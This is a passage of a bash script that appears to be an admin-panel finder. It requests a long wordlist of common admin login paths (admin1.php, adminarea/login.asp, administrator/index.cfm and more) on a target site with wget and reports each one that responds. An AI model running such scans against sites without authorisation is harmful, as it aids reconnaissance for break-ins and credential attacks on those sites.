echo "-----------------------------------------------------------------------"
fi
d="/admin_login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_login.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin1"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin1.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin1.htm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin1.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin1.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2/index.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2/index.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2/index.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2/index.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2/index.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2/index.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2/login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2/login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2/login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2/login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2/login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin2/login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin3"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin4"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin4_account"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin4_colon"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin5"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/admin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/admin.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/admin.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/admin.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/admin.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/admin.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/admin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/index.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/index.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/index.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/index.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/index.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/index.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/index.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/login.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adminarea/login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincontrol.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincontrol.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincontrol.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincontrol.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincontrol.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincontrol.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincontrol.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincontrol"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincontrol/login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincontrol/login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincontrol/login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincontrol/login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincontrol/login.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincontrol/login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincontrol/login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincp/index.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincp/index.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincp/index.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincp/login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincp/login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admincp/login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administer"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administr8"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administr8.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administr8.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administr8.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administracao"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administratie"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administration"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administration.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administration.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administration.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/account.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/account.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/account.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/account.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/account.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/account.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/account.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/index.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/index.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/index.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/index.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/index.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/index.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/index.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/administrator/login.cgi"
